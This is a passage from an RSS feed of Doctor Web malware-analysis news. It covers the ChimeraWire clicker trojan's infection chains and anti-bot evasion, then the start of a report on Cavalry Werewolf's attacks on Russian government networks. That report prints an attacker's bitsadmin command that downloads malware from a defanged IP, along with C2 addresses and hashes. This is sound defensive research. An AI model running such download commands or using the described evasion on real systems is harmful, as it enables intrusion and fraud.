    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_en.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/02_Trojan.DownLoader48.61444_noadmin_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A scheme illustrating &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt;’s operation when administrator rights are not available&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;When running as administrator, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; executes several PowerShell scripts for downloading the payload from the C2 server. One of the downloaded objects is the ZIP archive &lt;span class="string"&gt;one.zip&lt;/span&gt;. It contains the same files as the archive &lt;span class="string"&gt;onedrive.zip&lt;/span&gt; from the first infection chain (in particular, the legitimate app &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; and the malicious library &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt;, which is &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54318&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;).&lt;/p&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; extracts the archive and creates a System Scheduler task for running &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; at system boot. The trojan also launches this app. Just like in the first chain, a DLL Search Order Hijacking vulnerability is exploited in &lt;span class="string"&gt;OneDrivePatcher.exe&lt;/span&gt; upon its launch, and the trojan library &lt;span class="string"&gt;UpdateRingSettings.dll&lt;/span&gt; is automatically loaded. After that, the infection chain repeats the first scenario.&lt;/p&gt;

&lt;p&gt;At the same time, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; also downloads a second ZIP archive, &lt;span class="string"&gt;two.zip&lt;/span&gt;. It contains the malicious script &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; (&lt;span class="string"&gt;update.py&lt;/span&gt;) together with the files necessary for its execution. Among them is &lt;span class="string"&gt;Guardian.exe&lt;/span&gt;, a renamed copy of &lt;span class="string"&gt;pythonw.exe&lt;/span&gt;, the Python interpreter variant that runs without a console window.&lt;/p&gt;

&lt;p&gt;After extracting the archive, &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; creates a Task Scheduler task that launches &lt;span class="string"&gt;Guardian.exe&lt;/span&gt; at system boot. It also immediately executes the malicious script &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt; through this interpreter.&lt;/p&gt;

&lt;p&gt;By partially duplicating the first infection chain, threat actors apparently sought to increase the likelihood of successfully downloading &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; onto target systems.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_en.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/03_Trojan.DownLoader48.61444_admin_en.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;A scheme illustrating &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; operating with administrator rights&lt;/em&gt;&lt;/p&gt;

&lt;h3&gt;Trojan.ChimeraWire&lt;/h3&gt;

&lt;blockquote&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; got its name from combining the words “chimera”, a mythical creature with the body parts of several animals, and “wire”. The word “chimera” describes the hybrid nature of the attackers’ techniques: the use of trojan downloaders written in different programming languages as well as anti-debugging techniques and privilege escalation during the infection process. It also reflects the fact that the trojan is a combination of various frameworks, plugins, and legitimate software through which hidden traffic control is carried out. This is where the second word, “wire”, comes from: it refers to the trojan’s invisible and malicious network operation.&lt;/blockquote&gt;

&lt;p&gt;Once on the target computer, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; downloads the archive &lt;span class="string"&gt;chrome-win.zip&lt;/span&gt; from a third-party website. This archive contains the Google Chrome browser for Windows. It should be noted that this Internet resource also stores archives containing Google Chrome builds for other operating systems, like Linux and macOS, including those for various hardware platforms.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/04_chrome_download.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/04_chrome_download.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;The website with various Google Chrome builds from which the trojan downloads the necessary archive&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;When the browser is downloaded, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; tries to covertly install the add-ons NopeCHA and Buster into it. Designed for automated CAPTCHA solving, these add-ons will be used by the malware further along in its operation.&lt;/p&gt;

&lt;p&gt;Next, it launches the browser in remote debugging mode with a hidden window, which allows the malicious activity to proceed without the user noticing. The trojan then connects over the WebSocket protocol to the debugging port that the browser selected automatically.&lt;/p&gt;

&lt;p&gt;The trojan then proceeds to obtain tasks. It sends a request to the C2 server and receives a base64-encoded string in response. Once decoded, this string is the JSON configuration encrypted with the AES-GCM algorithm.&lt;/p&gt;

&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/05_config.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/05_config.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p class="text-center"&gt;&lt;em&gt;Example of the configuration that the trojan receives from the C2 server&lt;/em&gt;&lt;/p&gt;

&lt;p&gt;It contains tasks and the parameters related to them:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;the target search engine (the Google and Bing search platforms are supported);&lt;/li&gt;
    &lt;li&gt;the key phrases for searching websites in the target search engine and for their subsequent loading;&lt;/li&gt;
    &lt;li&gt;the maximum number of sequential transitions between webpages;&lt;/li&gt;
    &lt;li&gt;random distributions for performing automated clicks on webpages;&lt;/li&gt;
    &lt;li&gt;the wait time for loading pages;&lt;/li&gt;
    &lt;li&gt;the target domains.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;To more effectively simulate the activity of a real user and bypass systems that monitor constant activity, the configuration also includes parameters responsible for pauses between work sessions.&lt;/p&gt;

&lt;h3&gt;Simulating user mouse clicks&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; can perform the following types of clicks:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;for navigating search results;&lt;/li&gt;
    &lt;li&gt;for opening found relevant links in new background tabs.&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;First, using the target search engine, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; searches for websites using the domains and key phrases specified in the configuration. It then opens the websites listed in the search results and locates every HTML element on them that defines a hyperlink. The trojan puts these elements into an array and shuffles it so that the objects are ordered differently from how they appear on the webpage. This is meant to bypass website anti-bot protection that tracks the order of clicks.&lt;/p&gt;

&lt;p&gt;Next, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; checks whether the links it has found, and the strings they contain, match the template from the configuration, and counts the number of matches. Depending on this number, the malware follows one of two different algorithms.&lt;/p&gt;

&lt;p&gt;If a sufficient number of suitable links is found on the page, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; scans the page and sorts the detected links by their relevance (the links that most closely match key phrases are listed first). After that, a click is performed on one or multiple suitable links.&lt;/p&gt;

&lt;p&gt;If the number of matches with the given template is insufficient or there are none, the malware uses a probabilistic behavior model that imitates real human behavior as closely as possible. Based on the parameters from the configuration, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; uses a weighted distribution to determine the number of links to open. For example, the distribution &lt;span class="string"&gt;["1:90", "2:10"]&lt;/span&gt; means that the trojan will click 1 link with a probability of 90% and 2 links with a probability of 10%. Thus, the malware is highly likely to open 1 link. The trojan randomly selects the link from the array it created earlier and performs a click on it.&lt;/p&gt;

&lt;p&gt;Every time the trojan opens a link from the search results and performs clicks on the loaded webpage, it either returns to the previous browser tab or proceeds to the next one, depending on the task. These actions are repeated until the click limit for the target websites is exhausted.&lt;/p&gt;

&lt;p&gt;Below are examples of websites that the trojan was commanded to interact with in tasks received from the C2 server:&lt;/p&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/06_website.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/06_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/07_website.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/07_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom: 12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/08_website.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/december/chimera_wire/08_website.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;

&lt;p&gt;For detailed technical descriptions of the &lt;b&gt;ChimeraWire&lt;/b&gt; trojan and the malware involved in its download, please refer to the PDF version of the study or visit the Doctor Web virus library.&lt;/p&gt;

&lt;p&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54600&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54600&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.Starter.8377&amp;lng=en"&gt;&lt;b&gt;Trojan.Starter.8377&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Python.Downloader.208&amp;lng=en"&gt;&lt;b&gt;Python.Downloader.208&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.54318&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.54318&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
    More details about &lt;a href="https://vms.drweb.com/search/?q=Trojan.DownLoader48.61444&amp;lng=en"&gt;&lt;b&gt;Trojan.DownLoader48.61444&lt;/b&gt;&lt;/a&gt; 
&lt;/p&gt;

&lt;h3&gt;Conclusion&lt;/h3&gt;

&lt;p&gt;As of now, &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt;'s malicious activity essentially boils down to performing relatively simple clicker tasks to boost the popularity of websites. At the same time, the functionality of the tools that the trojan is based on allows it to perform a wider range of tasks, including automated actions under the guise of real user activity. For instance, malicious actors can utilize it to fill out web forms on various sites, including those conducting surveys for advertising purposes. In addition, they can use the trojan for reading the contents of webpages and taking screenshots of them — both for the purposes of cyber espionage and for automated data collection to build various databases (e.g., with emails, phone numbers, etc.). &lt;/p&gt;

&lt;p&gt;Thus, we can expect new &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; versions to emerge in the future, in which these and other features will be fully implemented. Doctor Web’s specialists continue to monitor the trojan’s evolution.&lt;/p&gt;

&lt;h3&gt;MITRE ATT&amp;CK®&lt;/h3&gt;

&lt;p&gt;We analyzed &lt;a href="https://vms.drweb.com/search/?q=Trojan.ChimeraWire.2&amp;lng=en" target="_blank"&gt;&lt;b&gt;Trojan.ChimeraWire&lt;/b&gt;&lt;/a&gt; using the MITRE ATT&amp;CK® framework, a matrix describing the tactics and techniques that cybercriminals utilize to attack information systems. The following key techniques were identified:&lt;/p&gt;

&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Stage&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;Technique&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;Execution&lt;/td&gt;
            &lt;td&gt;User Execution (T1204)&lt;br /&gt;&lt;br /&gt;Malicious File (T1204.002)&lt;br /&gt;&lt;br /&gt;Malicious Library (T1204.005)&lt;br /&gt;&lt;br /&gt;PowerShell (T1059.001)&lt;br /&gt;&lt;br /&gt;Windows Command Shell (T1059.003)&lt;br /&gt;&lt;br /&gt;Visual Basic (T1059.005)&lt;br /&gt;&lt;br /&gt;Python (T1059.006)&lt;br /&gt;&lt;br /&gt;Scheduled Task (T1053.005)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Persistence&lt;/td&gt;
            &lt;td&gt;Registry Run Keys / Startup Folder (T1547.001)&lt;br /&gt;&lt;br /&gt;Scheduled Task/Job (T1053)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Privilege Escalation&lt;/td&gt;
            &lt;td&gt;Hijack Execution Flow: DLL (T1574.001)&lt;br /&gt;&lt;br /&gt;Bypass User Account Control (T1548.002)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Defense Evasion&lt;/td&gt;
            &lt;td&gt;Encrypted/Encoded File (T1027.013)&lt;br /&gt;&lt;br /&gt;Debugger Evasion (T1622)&lt;br /&gt;&lt;br /&gt;Hidden Window (T1564.003)&lt;br /&gt;&lt;br /&gt;File/Path Exclusions (T1564.012)&lt;br /&gt;&lt;br /&gt;Deobfuscate/Decode Files or Information (T1140)&lt;br /&gt;&lt;br /&gt;Hijack Execution Flow: DLL (T1574.001)&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;Command and Control&lt;/td&gt;
            &lt;td&gt;Bidirectional Communication (T1102.002)&lt;br /&gt;&lt;br /&gt;Web Protocols (T1071.001)&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/Trojan.ChimeraWire/README.adoc" target="_blank"&gt;Indicators of compromise&lt;/a&gt;</description></item><item><guid>https://news.drweb.com/show/?i=15078&amp;lng=en</guid><title>Cavalry Werewolf hacker group attacks Russian state institutions</title><link>https://news.drweb.com/show/?i=15078&amp;lng=en&amp;c=23</link><pubDate>Thu, 06 Nov 2025 00:00:00 GMT</pubDate><description>&lt;div class="vir_rev_btn center"&gt;
    &lt;a href="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/Cavalry_Werewolf_en.pdf" class='btn'&gt;Download PDF&lt;/a&gt;
&lt;/div&gt;
&lt;p&gt;&lt;b&gt;November 6, 2025&lt;/b&gt;&lt;/p&gt;
&lt;h3&gt;Introduction&lt;/h3&gt;
&lt;p&gt;&lt;newslead&gt;In July 2025, Doctor Web was contacted by a client from a government-owned organization within the Russian Federation with suspicions that its internal network had been compromised. The suspicion arose because spam emails were detected as coming from one of their corporate email addresses. An investigation into the incident, conducted by our anti-virus laboratory, revealed that the institution had been subjected to a targeted attack by a hacker group, which our experts identified as Cavalry Werewolf. One of the attack’s goals was to collect confidential information as well as network configuration data.&lt;/newslead&gt;&lt;/p&gt;
&lt;p&gt;During the examination, our experts identified previously unknown malware, including tools built on open-source projects. Among them were various backdoors that allow commands to be executed remotely on attacked systems and the ground to be prepared for reconnaissance and for establishing a deeper foothold in the network infrastructure.&lt;/p&gt;
&lt;p&gt;In this study, we will discuss the Cavalry Werewolf tools that we discovered and consider the features of this hacker group and the typical actions that these cybercriminals perform in compromised networks.&lt;/p&gt;
&lt;h3&gt;General information about the attack and the tools involved&lt;/h3&gt;
&lt;p&gt;To gain initial access to one of the computers, the threat actors utilized a common attack vector: phishing emails with malware disguised as documents attached. In this particular case, the messages contained &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ShellNET.1&amp;lng=en"&gt;&lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;&lt;/a&gt;, a backdoor that was unknown at the time of the attack. This malware is based on &lt;a href="https://github.com/xcyraxx/Reverse-Shell-CS" target="_blank"&gt;Reverse-Shell-CS&lt;/a&gt; open-source software. It allows infected systems to be connected to remotely via a reverse shell and commands to be executed. This backdoor was located in a password-protected archive and had different names, depending on the particular phishing campaign involved.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Name variants for BackDoor.ShellNET.1&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Службеная записка от 16.06.2025___________________________.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О ПРЕДОСТАВЛЕНИИ ИНФОРМАЦИИ ДЛЯ ПОДГОТОВКИ СОВЕЩАНИЯ.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О проведении личного приема граждан список участников.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;div class="column_grid_review column_grid_review--o" style="margin-bottom:12px;"&gt;
    &lt;a class="preview" href="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.png"&gt;
        &lt;img src="https://st.drweb.com/static/new-www/news/2025/october/cavalry_werewolf/01_phishing.2.1.png" alt="#drweb"&gt;
    &lt;/a&gt;
&lt;/div&gt;
&lt;p style="text-align: center;"&gt;&lt;em&gt;An example of a phishing email containing &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;. The attackers offer the potential victim a “document” to read and provide a password that can be used to unpack the archive&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Using &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt;, the threat actors continued to entrench themselves in the target system. They downloaded several malicious apps through the standard Windows tool Bitsadmin (&lt;span class="string"&gt;C:\Windows\SysWOW64\bitsadmin.exe&lt;/span&gt;), which manages file transfer tasks. This program was launched with a particular set of command-line switches and on behalf of the current system administrator, as shown in the example below:&lt;/p&gt;
&lt;div class="grid"&gt;
&lt;pre&gt;&lt;code&gt;cmd: bitsadmin /transfer www /download hxxp[:]//195[.]2.79[.]245/winpot.exe 
C:\users\public\downloads\winpot.exe&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
&lt;p&gt;The first threat downloaded with &lt;b&gt;BackDoor.ShellNET.1&lt;/b&gt; was the &lt;a href="https://vms.drweb.com/search/?q=Trojan.FileSpyNET.5&amp;lng=en"&gt;&lt;b&gt;Trojan.FileSpyNET.5&lt;/b&gt;&lt;/a&gt; trojan stealer. The cybercriminals used it to download documents stored on the computer in the .doc, .docx, .xlsx, and .pdf formats, as well as text files (.txt) and images (.jpg, .png).&lt;/p&gt;
&lt;p&gt;Next, the attackers installed &lt;a href="https://vms.drweb.com/search/?q=BackDoor.Tunnel.41&amp;lng=en"&gt;&lt;b&gt;BackDoor.Tunnel.41&lt;/b&gt;&lt;/a&gt; (a backdoor based on the open-source &lt;a href="https://github.com/Acebond/ReverseSocks5" target="_blank"&gt;ReverseSocks5&lt;/a&gt; software) to create SOCKS5 tunnels and inconspicuously connect to the computer in order to execute commands on it, including commands that install other malware.&lt;/p&gt;
&lt;h3&gt;Cavalry Werewolf tools&lt;/h3&gt;
&lt;p&gt;Our investigation into this incident allowed us to uncover not only the aforementioned malware, but also many other tools that this criminal group uses to carry out targeted attacks. It should be noted that Cavalry Werewolf’s malware creators do not limit themselves to a single set of malicious apps and are constantly expanding their arsenal. For this reason, the tools for penetrating target systems can vary, as can the later stages of the infection chain, depending on which institution is being attacked.&lt;/p&gt;
&lt;h3&gt;The entry point&lt;/h3&gt;
&lt;p&gt;The malicious programs attached to Cavalry Werewolf’s phishing emails are the first stage in the infection chain, and they come in several forms. Doctor Web’s virus analysts identified the following variants:&lt;/p&gt;
&lt;ul class="list"&gt;
    &lt;li&gt;scripts (&lt;a href="https://vms.drweb.com/search/?q=BAT.DownLoader.1138&amp;lng=en"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/a&gt;);&lt;/li&gt;
    &lt;li&gt;executable files (&lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.49708&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen31.54011&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.com/search/?q=BackDoor.Siggen2.5463&amp;lng=en"&gt;&lt;b&gt;BackDoor.Siggen2.5463&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.com/search/?q=BackDoor.RShell.169&amp;lng=en"&gt;&lt;b&gt;BackDoor.RShell.169&lt;/b&gt;&lt;/a&gt;, &lt;a href="https://vms.drweb.com/search/?q=BackDoor.ReverseShell.10&amp;lng=en"&gt;&lt;b&gt;BackDoor.ReverseShell.10&lt;/b&gt;&lt;/a&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;BAT.DownLoader.1138&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This is a batch file that downloads &lt;b&gt;PowerShell.BackDoor.109&lt;/b&gt;, PowerShell backdoor malware, into the target system. With its help, the threat actors download and run other malware on the computer.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for BAT.DownLoader.1138&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;&lt;span class="string"&gt;scan26_08_2025.bat&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;d2106c8dfd0c681c27483a21cc72d746b2e5c18c&lt;/td&gt;
            &lt;td&gt;168[.]100.10[.]73&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This trojan installs the &lt;b&gt;BackDoor.Spy.4033&lt;/b&gt; malware that is stored in encrypted form in its body. This backdoor allows the attackers to execute commands in the infected system via a reverse shell.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
            &lt;th&gt;&lt;b&gt;Known file names for Trojan.Packed2.49708&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;SHA1 hash&lt;/b&gt;&lt;/th&gt;
            &lt;th&gt;&lt;b&gt;C2 server&lt;/b&gt;&lt;/th&gt;
        &lt;/tr&gt;
    &lt;/thead&gt;
    &lt;tbody&gt;
        &lt;tr&gt;
            &lt;td class="first"&gt;
                &lt;span class="string"&gt;О проведении личного приема граждан список участников план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\2o1nzu.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;5684972ded765b0b08b290c85c8fac8ed3fea273&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string"&gt;Аппарат Правительства Российской Федерации по вопросу отнесения реализуемых на территории Сибирского федерального округа.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;29ee3910d05e248cfb3ff62bd2e85e9c76db44a5&lt;/td&gt;
            &lt;td&gt;185[.]231.155[.]111&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;
                &lt;span class="string"&gt;О работе почтового сервера план и проведенная работа.exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;Программный офис Управления Организации Объединенных Наций по наркотикам и преступности (УНП ООН).exe&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;
                &lt;span class="string"&gt;План-протокол встречи о сотрудничестве представителей должн.лиц.exe&lt;/span&gt;
            &lt;/td&gt;
            &lt;td&gt;ce4912e5cd46fae58916c9ed49459c9232955302&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;&lt;span class="string" style="text-wrap: nowrap;"&gt;C:\Windows\746wljxfs.exe&lt;/span&gt;&lt;/td&gt;
            &lt;td&gt;653ffc8c3ec85c6210a416b92d828a28b2353c17&lt;/td&gt;
            &lt;td&gt;185[.]173.37[.]67&lt;/td&gt;
        &lt;/tr&gt;
        &lt;tr&gt;
            &lt;td&gt;—&lt;/td&gt;
            &lt;td&gt;b52e1c9484ab694720dc62d501deca2aa922a078&lt;/td&gt;
            &lt;td&gt;109[.]172.85[.]95&lt;/td&gt;
        &lt;/tr&gt;
    &lt;/tbody&gt;
 &lt;/table&gt;
&lt;/div&gt;
&lt;p style="margin-top: 30px;"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/p&gt;
&lt;p&gt;This trojan installs the &lt;b&gt;BackDoor.Spy.4038&lt;/b&gt; malware that is stored in encrypted form in its body. This backdoor allows the attackers to execute commands in the infected system via a reverse shell.&lt;/p&gt;
&lt;p&gt;Functionality-wise, &lt;a href="https://vms.drweb.com/search/?q=Trojan.Siggen31.54011&amp;lng=en"&gt;&lt;b&gt;Trojan.Siggen31.54011&lt;/b&gt;&lt;/a&gt; is similar to the &lt;a href="https://vms.drweb.com/search/?q=Trojan.Packed2.49708&amp;lng=en"&gt;&lt;b&gt;Trojan.Packed2.49708&lt;/b&gt;&lt;/a&gt; malware, but it has a slightly different payload-extraction algorithm.&lt;/p&gt;
&lt;div class="table-news-secondary"&gt;
 &lt;table&gt;
    &lt;thead&gt;
        &lt;tr&gt;
